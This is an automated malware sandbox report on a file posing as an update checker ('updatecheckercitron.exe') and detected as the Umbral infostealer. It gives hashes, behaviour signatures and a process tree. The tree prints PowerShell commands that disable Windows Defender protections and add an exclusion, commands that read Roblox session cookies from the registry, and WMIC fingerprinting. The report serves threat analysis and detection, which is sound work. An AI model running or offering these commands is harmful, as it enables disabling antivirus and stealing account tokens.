Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    12-08-2024 09:27

General

  • Target

    citrontoppest/citrontoppest/citrontoppest/updatechecker/updatecheckercitron.exe

  • Size

    227KB

  • MD5

    a6db1722b4ed09cd06fbdf6f80df47da

  • SHA1

    1fe86fceb4884cb37c4187591ccecd7a4c4d9c15

  • SHA256

    ed1deb13b32c20b6cd35d50351c78d3729315dac5da6f5795dae2c14bed8520b

  • SHA512

    61542031f6f60fca814400c9ec21c0eefa15422646c30b5b3192231a4d5a5845681f7d619818fa0c7c448f860101790d7971c80aa90637e58956b33023079785

  • SSDEEP

    6144:+loZMLrIkd8g+EtXHkv/iD4cYiL+cCFdWQj+ctBIpHb8e1mUi:ooZ0L+EP8cYiL+cCFdWQj+ctBIhK

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe
    "C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1036
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:2020
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1924
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2928

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        f0b39660674fe7eb69d49521866614d7

        SHA1

        25aca0b0ea902e43b4960162196961a3f27b3e6d

        SHA256

        fb478948c143f5cdff0edb0781a376ff1216852c031341391b1aede8b59cd163

        SHA512

        83d0eafb6eeff5e4cb0389595b89b6fd999979ab1db2bcced7f55eafa79b9b6969e1857891c64185019bf6fa587c4f6bf5bb1d44c8f8d8359391e16e28641e24

      • memory/1924-44-0x00000000027E0000-0x00000000027E8000-memory.dmp

        Filesize

        32KB

      • memory/2172-0-0x000007FEF5013000-0x000007FEF5014000-memory.dmp

        Filesize

        4KB

      • memory/2172-1-0x00000000012D0000-0x0000000001310000-memory.dmp

        Filesize

        256KB

      • memory/2172-2-0x000007FEF5010000-0x000007FEF59FC000-memory.dmp

        Filesize

        9.9MB

      • memory/2172-48-0x000007FEF5010000-0x000007FEF59FC000-memory.dmp

        Filesize

        9.9MB

      • memory/2632-14-0x000000001B740000-0x000000001BA22000-memory.dmp

        Filesize

        2.9MB

      • memory/2632-15-0x0000000001E80000-0x0000000001E88000-memory.dmp

        Filesize

        32KB

      • memory/2700-7-0x000000001B650000-0x000000001B932000-memory.dmp

        Filesize

        2.9MB

      • memory/2700-8-0x0000000002790000-0x0000000002798000-memory.dmp

        Filesize

        32KB